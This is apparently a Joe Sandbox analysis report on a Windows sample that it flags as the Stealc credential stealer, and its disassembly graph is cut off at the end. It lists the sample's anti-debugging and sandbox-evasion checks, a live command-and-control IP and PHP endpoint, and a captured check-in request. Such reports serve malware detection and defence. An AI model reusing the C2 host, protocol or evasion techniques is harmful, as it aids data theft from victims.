                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37913
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37747
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E4610 VirtualProtect ?,00000004,00000100,000000000_2_007E4610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007F9BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F9AA0 mov eax, dword ptr fs:[00000030h]0_2_007F9AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_007F7690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6528, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_007F9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_007F98E0
                Source: file.exe, file.exe, 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: C1Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00827588 cpuid 0_2_00827588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_007F7D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F7B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_007F7B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_007F79E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_007F7BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.7e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2065563617.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6528, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.7e0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2065563617.0000000005130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6528, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206xj:ofile.exe, 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.php/file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206file.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.206/6c4adf523b719729.php/mfile.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206/6c4adf523b719729.phplfile.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/6c4adf523b719729.phpHfile.exe, 00000000.00000002.2107101816.0000000001499000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2065563617.000000000515B000.00000004.00001000.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.206
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1543747
                                Start date and time:2024-10-28 11:21:09 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 19s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:2
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 134
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLBjl3geiFEK.exeGet hashmaliciousPhorpiexBrowse
                                • 185.215.113.66
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaCBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaCBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaCBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.9593043035745525
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:2'108'416 bytes
                                MD5:fae77ee19103237b52405630de9aa6a7
                                SHA1:5fa3fae94c12a0fc0fa6de9d9dfb72aa0ee0749b
                                SHA256:09a622aeeec375f783c6a88a7f9bb6f9a1cf90af6dcf2d57f18eda2ca5a88cca
                                SHA512:6e9658bd66aa5a19b3df0b06268ea4d97e9459b42d9a1ca769cc4adab388ca0d892eae66a1dbcd75c1b8111a476952437d1958bced158a4ea53dec7ae60fcbac
                                SSDEEP:49152:HZftVYV5oaLjvX4/dQ+J4dgRlP1pZSGCSRy7W:HZftVm7KQ++dgRlP18SRy7W
                                TLSH:F4A5334EC693DC2BECF58737E8CDA563D1666B2E5C2ECB2145B499335AEB30C64C4052
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0xb1f000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007FBA69086E5Ah

                                Rich Headers

                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x2e70000x67600292b81d7c7cb4b0c6c60f8171c0877ecunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x2ea0000x29c0000x200ed7493e2cf12fbc2466c69275aa71423unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                gauffcuy0x5860000x1980000x197c00a203a3a69c957ff2d0ee5aaa95d2b4d4False0.9951195825030656data7.95487743480404IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                psmvcilc0x71e0000x10000x400df982fdf59cb03ccb4a4cdc2a8bee0b7False0.783203125data6.083863705894662IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0x71f0000x30000x2200bcf7d7b14e9b7766723fc6eb52fad597False0.0661764705882353DOS executable (COM)0.8160131490665861IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Suricata IDS Alerts

                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-10-28T11:22:06.086992+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 28, 2024 11:22:04.866813898 CET4970480192.168.2.5185.215.113.206
                                Oct 28, 2024 11:22:04.872369051 CET8049704185.215.113.206192.168.2.5
                                Oct 28, 2024 11:22:04.872483969 CET4970480192.168.2.5185.215.113.206
                                Oct 28, 2024 11:22:04.872705936 CET4970480192.168.2.5185.215.113.206
                                Oct 28, 2024 11:22:04.878412962 CET8049704185.215.113.206192.168.2.5
                                Oct 28, 2024 11:22:05.789527893 CET8049704185.215.113.206192.168.2.5
                                Oct 28, 2024 11:22:05.789732933 CET4970480192.168.2.5185.215.113.206
                                Oct 28, 2024 11:22:05.794266939 CET4970480192.168.2.5185.215.113.206
                                Oct 28, 2024 11:22:05.799633026 CET8049704185.215.113.206192.168.2.5
                                Oct 28, 2024 11:22:06.086846113 CET8049704185.215.113.206192.168.2.5
                                Oct 28, 2024 11:22:06.086992025 CET4970480192.168.2.5185.215.113.206
                                Oct 28, 2024 11:22:08.760154963 CET4970480192.168.2.5185.215.113.206

                                HTTP Request Dependency Graph

                                • 185.215.113.206

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549704185.215.113.206806528C:\Users\user\Desktop\file.exe
                                TimestampBytes transferredDirectionData
                                Oct 28, 2024 11:22:04.872705936 CET90OUTGET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Oct 28, 2024 11:22:05.789527893 CET203INHTTP/1.1 200 OK
                                Date: Mon, 28 Oct 2024 10:22:05 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Oct 28, 2024 11:22:05.794266939 CET412OUTPOST /6c4adf523b719729.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAK
                                Host: 185.215.113.206
                                Content-Length: 210
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 41 46 41 36 37 44 42 37 32 31 38 31 39 34 33 30 31 37 39 32 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 2d 2d 0d 0a
                                Data Ascii: ------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="hwid"9AFA67DB7218194301792------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="build"tale------HJDBFBKKJDHJKECBGDAK--
                                Oct 28, 2024 11:22:06.086846113 CET210INHTTP/1.1 200 OK
                                Date: Mon, 28 Oct 2024 10:22:05 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                System Behavior

                                General

                                Target ID:0
                                Start time:06:22:01
                                Start date:28/10/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0x7e0000
                                File size:2'108'416 bytes
                                MD5 hash:FAE77EE19103237B52405630DE9AA6A7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2065563617.0000000005130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2107101816.000000000143E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:2.9%
                                  Total number of Nodes:1327
                                  Total number of Limit Nodes:24
                                  execution_graph 37704 7f6c90 37749 7e22a0 37704->37749 37728 7f6d04 37729 7facc0 4 API calls 37728->37729 37730 7f6d0b 37729->37730 37731 7facc0 4 API calls 37730->37731 37732 7f6d12 37731->37732 37733 7facc0 4 API calls 37732->37733 37734 7f6d19 37733->37734 37735 7facc0 4 API calls 37734->37735 37736 7f6d20 37735->37736 37901 7fabb0 37736->37901 37738 7f6dac 37905 7f6bc0 GetSystemTime 37738->37905 37740 7f6d29 37740->37738 37742 7f6d62 OpenEventA 37740->37742 37743 7f6d79 37742->37743 37744 7f6d95 CloseHandle Sleep 37742->37744 37748 7f6d81 CreateEventA 37743->37748 37746 7f6daa 37744->37746 37746->37740 37747 7f6db6 CloseHandle ExitProcess 37748->37738 38102 7e4610 37749->38102 37751 7e22b4 37752 7e4610 2 API calls 37751->37752 37753 7e22cd 37752->37753 37754 7e4610 2 API calls 37753->37754 37755 7e22e6 37754->37755 37756 7e4610 2 API calls 37755->37756 37757 7e22ff 37756->37757 37758 7e4610 2 API calls 37757->37758 37759 7e2318 37758->37759 37760 7e4610 2 API calls 37759->37760 37761 7e2331 37760->37761 37762 7e4610 2 API calls 37761->37762 37763 7e234a 37762->37763 37764 7e4610 2 API calls 37763->37764 37765 7e2363 37764->37765 37766 7e4610 2 API calls 37765->37766 37767 7e237c 37766->37767 37768 7e4610 2 API calls 37767->37768 37769 7e2395 37768->37769 37770 7e4610 2 API calls 37769->37770 37771 7e23ae 37770->37771 37772 7e4610 2 API calls 37771->37772 37773 7e23c7 37772->37773 37774 7e4610 2 API calls 37773->37774 37775 7e23e0 37774->37775 37776 7e4610 2 API calls 37775->37776 37777 7e23f9 37776->37777 37778 7e4610 2 API calls 37777->37778 37779 7e2412 37778->37779 37780 7e4610 2 API calls 37779->37780 37781 7e242b 37780->37781 37782 7e4610 2 API calls 37781->37782 37783 7e2444 37782->37783 37784 7e4610 2 API calls 37783->37784 37785 7e245d 37784->37785 37786 7e4610 2 API calls 37785->37786 37787 7e2476 37786->37787 37788 7e4610 2 API calls 37787->37788 37789 7e248f 37788->37789 37790 7e4610 2 API calls 37789->37790 37791 7e24a8 37790->37791 37792 7e4610 2 API calls 37791->37792 37793 7e24c1 37792->37793 37794 7e4610 2 API calls 37793->37794 37795 7e24da 37794->37795 37796 7e4610 2 API calls 37795->37796 37797 7e24f3 37796->37797 37798 7e4610 2 API calls 37797->37798 37799 7e250c 37798->37799 37800 7e4610 2 API calls 37799->37800 37801 7e2525 37800->37801 37802 7e4610 2 API calls 37801->37802 37803 7e253e 37802->37803 37804 7e4610 2 API calls 37803->37804 37805 7e2557 37804->37805 37806 7e4610 2 API calls 37805->37806 37807 7e2570 37806->37807 37808 7e4610 2 API calls 37807->37808 37809 7e2589 37808->37809 37810 7e4610 2 API calls 37809->37810 37811 7e25a2 37810->37811 37812 7e4610 2 API calls 37811->37812 37813 7e25bb 37812->37813 37814 7e4610 2 API calls 37813->37814 37815 7e25d4 37814->37815 37816 7e4610 2 API calls 37815->37816 37817 7e25ed 37816->37817 37818 7e4610 2 API calls 37817->37818 37819 7e2606 37818->37819 37820 7e4610 2 API calls 37819->37820 37821 7e261f 37820->37821 37822 7e4610 2 API calls 37821->37822 37823 7e2638 37822->37823 37824 7e4610 2 API calls 37823->37824 37825 7e2651 37824->37825 37826 7e4610 2 API calls 37825->37826 37827 7e266a 37826->37827 37828 7e4610 2 API calls 37827->37828 37829 7e2683 37828->37829 37830 7e4610 2 API calls 37829->37830 37831 7e269c 37830->37831 37832 7e4610 2 API calls 37831->37832 37833 7e26b5 37832->37833 37834 7e4610 2 API calls 37833->37834 37835 7e26ce 37834->37835 37836 7f9bb0 37835->37836 38107 7f9aa0 GetPEB 37836->38107 37838 7f9bb8 37839 7f9bca 37838->37839 37840 7f9de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 37838->37840 37843 7f9bdc 21 API calls 37839->37843 37841 7f9e5d 37840->37841 37842 7f9e44 GetProcAddress 37840->37842 37844 7f9e96 37841->37844 37845 7f9e66 GetProcAddress GetProcAddress 37841->37845 37842->37841 37843->37840 37846 7f9e9f GetProcAddress 37844->37846 37847 7f9eb8 37844->37847 37845->37844 37846->37847 37848 7f9ed9 37847->37848 37849 7f9ec1 GetProcAddress 37847->37849 37850 7f9ee2 GetProcAddress GetProcAddress 37848->37850 37851 7f6ca0 37848->37851 37849->37848 37850->37851 37852 7faa50 37851->37852 37853 7faa60 37852->37853 37854 7f6cad 37853->37854 37855 7faa8e lstrcpy 37853->37855 37856 7e11d0 37854->37856 37855->37854 37857 